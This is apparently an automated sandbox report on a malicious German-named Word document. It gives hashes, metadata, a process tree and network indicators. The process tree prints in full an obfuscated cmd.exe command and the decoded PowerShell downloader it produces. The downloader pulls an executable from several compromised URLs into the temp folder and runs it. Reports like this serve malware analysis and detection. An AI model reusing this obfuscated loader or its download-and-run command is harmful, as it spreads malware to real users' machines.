File name: | 2018_12Details_bzgl_Transaktion.doc |
Full analysis: | https://app.any.run/tasks/9def57e6-ce1a-4609-89e9-3e1a3f40b68f |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 09:05:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 10 06:57:00 2018, Last Saved Time/Date: Mon Dec 10 06:57:00 2018, Number of Pages: 1, Number of Words: 6, Number of Characters: 39, Security: 0 |
MD5: | C554ECF8AAEB7D8E32896D81392BE6E8 |
SHA1: | 63D89A1800AC0DFED5D93336E9799783B2227267 |
SHA256: | 0678000FAD588BE7FC9FE74E4EE1FCAEF10E37E621895A3891BAB1A92BF72698 |
SSDEEP: | 1536:l5w1LD4fbKghmXB5luOUom8uW4k+a9oGzO04K:Tw13eKQOUo10q34K |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:10 06:57:00 |
ModifyDate: | 2018:12:10 06:57:00 |
Pages: | 1 |
Words: | 6 |
Characters: | 39 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 44 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3380 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2018_12Details_bzgl_Transaktion.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2816 | c:\abrutVjB\TjdiWRA\NAcKWliL\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Kt=VOBpoAEMGwNujVBQzhpVYwDFsYjXnuWH6}lx:Tm=ck'ft, yq.Cd{0g;8@\Ri(v$-aKrSULPb)+/Ie&&for %r in (63;44;5;22;39;42;19;37;22;42;55;63;8;27;18;39;28;77;21;64;4;72;26;77;40;44;46;10;77;44;49;30;77;72;50;34;60;77;28;44;55;63;69;37;59;39;42;17;44;44;18;36;75;75;21;18;44;17;77;38;77;24;49;40;4;38;75;15;51;1;57;17;44;44;18;36;75;75;21;77;67;77;24;4;34;62;77;49;40;65;75;41;70;66;57;17;44;44;18;36;75;75;44;4;38;64;24;44;77;77;51;49;40;4;38;75;15;72;57;17;44;44;18;36;75;75;17;77;67;72;34;60;77;72;77;67;38;65;28;40;4;38;38;29;28;60;44;47;34;77;65;51;77;67;24;17;60;18;65;21;65;67;51;49;4;67;54;75;35;26;54;32;40;56;57;17;44;44;18;36;75;75;18;24;47;40;17;4;34;4;54;47;34;60;72;24;49;67;29;75;29;68;1;69;42;49;68;18;34;60;44;61;42;57;42;73;55;63;71;51;72;39;42;5;34;4;42;55;63;44;28;69;46;39;46;42;56;53;32;42;55;63;21;48;22;39;42;26;37;26;42;55;63;50;19;16;39;63;77;28;62;36;44;77;38;18;74;42;58;42;74;63;44;28;69;74;42;49;77;35;77;42;55;43;4;67;77;65;40;17;61;63;41;14;10;46;60;28;46;63;69;37;59;73;52;44;67;47;52;63;8;27;18;49;22;4;21;28;34;4;65;51;23;60;34;77;61;63;41;14;10;45;46;63;50;19;16;73;55;63;51;70;7;39;42;66;66;62;42;55;76;43;46;61;61;8;77;44;64;76;44;77;38;46;63;50;19;16;73;49;34;77;28;54;44;17;46;64;54;77;46;56;53;53;53;53;73;46;52;76;28;62;4;41;77;64;76;44;77;38;46;63;50;19;16;55;63;24;60;23;39;42;14;16;5;42;55;72;67;77;65;41;55;33;33;40;65;44;40;17;52;33;33;63;26;40;31;39;42;24;71;15;42;55;79)do set Dz0m=!Dz0m!!Kt:~%r,1!&&if %r equ 79 p%TMP:~-9,1%%windir:~-7,1%ersh%TMP:~-3,1%l%ProgramFiles:~-3,1% "!Dz0m:~6!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3384 | CmD /V:O/C"set Kt=VOBpoAEMGwNujVBQzhpVYwDFsYjXnuWH6}lx:Tm=ck'ft, yq.Cd{0g;8@\Ri(v$-aKrSULPb)+/Ie&&for %r in (63;44;5;22;39;42;19;37;22;42;55;63;8;27;18;39;28;77;21;64;4;72;26;77;40;44;46;10;77;44;49;30;77;72;50;34;60;77;28;44;55;63;69;37;59;39;42;17;44;44;18;36;75;75;21;18;44;17;77;38;77;24;49;40;4;38;75;15;51;1;57;17;44;44;18;36;75;75;21;77;67;77;24;4;34;62;77;49;40;65;75;41;70;66;57;17;44;44;18;36;75;75;44;4;38;64;24;44;77;77;51;49;40;4;38;75;15;72;57;17;44;44;18;36;75;75;17;77;67;72;34;60;77;72;77;67;38;65;28;40;4;38;38;29;28;60;44;47;34;77;65;51;77;67;24;17;60;18;65;21;65;67;51;49;4;67;54;75;35;26;54;32;40;56;57;17;44;44;18;36;75;75;18;24;47;40;17;4;34;4;54;47;34;60;72;24;49;67;29;75;29;68;1;69;42;49;68;18;34;60;44;61;42;57;42;73;55;63;71;51;72;39;42;5;34;4;42;55;63;44;28;69;46;39;46;42;56;53;32;42;55;63;21;48;22;39;42;26;37;26;42;55;63;50;19;16;39;63;77;28;62;36;44;77;38;18;74;42;58;42;74;63;44;28;69;74;42;49;77;35;77;42;55;43;4;67;77;65;40;17;61;63;41;14;10;46;60;28;46;63;69;37;59;73;52;44;67;47;52;63;8;27;18;49;22;4;21;28;34;4;65;51;23;60;34;77;61;63;41;14;10;45;46;63;50;19;16;73;55;63;51;70;7;39;42;66;66;62;42;55;76;43;46;61;61;8;77;44;64;76;44;77;38;46;63;50;19;16;73;49;34;77;28;54;44;17;46;64;54;77;46;56;53;53;53;53;73;46;52;76;28;62;4;41;77;64;76;44;77;38;46;63;50;19;16;55;63;24;60;23;39;42;14;16;5;42;55;72;67;77;65;41;55;33;33;40;65;44;40;17;52;33;33;63;26;40;31;39;42;24;71;15;42;55;79)do set Dz0m=!Dz0m!!Kt:~%r,1!&&if %r equ 79 poWershell "!Dz0m:~6!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2796 | poWershell "$tAD='VTD';$GXp=new-object Net.WebClient;$UTR='http://wpthemes.com/QdO@http://weresolve.ca/kLK@http://tom-steed.com/Qb@http://herbliebermancommunityleadershipaward.org/xjg6c8@http://psychologylibs.ru/uSOU'.Split('@');$Pdb='Alo';$tnU = '806';$wqD='jTj';$CVz=$env:temp+'\'+$tnU+'.exe';foreach($kBN in $UTR){try{$GXp.DownloadFile($kBN, $CVz);$dLM='KKv';If ((Get-Item $CVz).length -ge 80000) {Invoke-Item $CVz;$siF='BzA';break;}}catch{}}$jcH='sPQ';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE7F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2796 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0VI1GDI8LZ7OG1VO1TD0.temp | — | |
MD5:— | SHA256:— | |||
2796 | powershell.exe | C:\Users\admin\AppData\Local\Temp\806.exe | — | |
MD5:— | SHA256:— | |||
3380 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:AAE1F34939203117AC1F4B1DA330748D | SHA256:A8522EFD13191ED100712611DBB7B818993A3A9AEE4584A1360605C4D2C4BD74 | |||
2796 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121bbe.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2796 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$18_12Details_bzgl_Transaktion.doc | pgc | |
MD5:416F171E9BBADC4C93CF7D2EF34671E0 | SHA256:35A1E0748FF64F077436C61482AC381BBD414FE534E93BDB328FB4A16DCC6819 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2796 | powershell.exe | GET | 404 | 66.84.12.179:80 | http://weresolve.ca/kLK | US | html | 382 b | malicious |
2796 | powershell.exe | GET | 302 | 50.62.89.138:80 | http://herbliebermancommunityleadershipaward.org/xjg6c8 | US | html | 265 b | malicious |
2796 | powershell.exe | GET | 200 | 96.30.17.180:80 | http://wpthemes.com/cgi-sys/suspendedpage.cgi | US | html | 7.40 Kb | malicious |
2796 | powershell.exe | GET | 403 | 37.9.175.7:80 | http://tom-steed.com/Qb | SK | html | 166 b | malicious |
2796 | powershell.exe | GET | 302 | 96.30.17.180:80 | http://wpthemes.com/QdO | US | html | 229 b | malicious |
2796 | powershell.exe | GET | 404 | 81.177.135.183:80 | http://psychologylibs.ru/uSOU | RU | html | 632 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2796 | powershell.exe | 96.30.17.180:80 | wpthemes.com | Liquid Web, L.L.C | US | malicious |
2796 | powershell.exe | 37.9.175.7:80 | tom-steed.com | Websupport s.r.o. | SK | malicious |
2796 | powershell.exe | 66.84.12.179:80 | weresolve.ca | CONTINENTAL BROADBAND PENNSYLVANIA, INC. | US | malicious |
2796 | powershell.exe | 72.167.191.65:80 | p3nlhclust404.shr.prod.phx3.secureserver.net | GoDaddy.com, LLC | US | unknown |
2796 | powershell.exe | 50.62.89.138:80 | herbliebermancommunityleadershipaward.org | GoDaddy.com, LLC | US | malicious |
2796 | powershell.exe | 81.177.135.183:80 | psychologylibs.ru | JSC RTComm.RU | RU | malicious |
Domain | IP | Reputation |
---|---|---|
wpthemes.com |
| malicious |
weresolve.ca |
| malicious |
tom-steed.com |
| malicious |
herbliebermancommunityleadershipaward.org |
| malicious |
p3nlhclust404.shr.prod.phx3.secureserver.net |
| unknown |
psychologylibs.ru |
| malicious |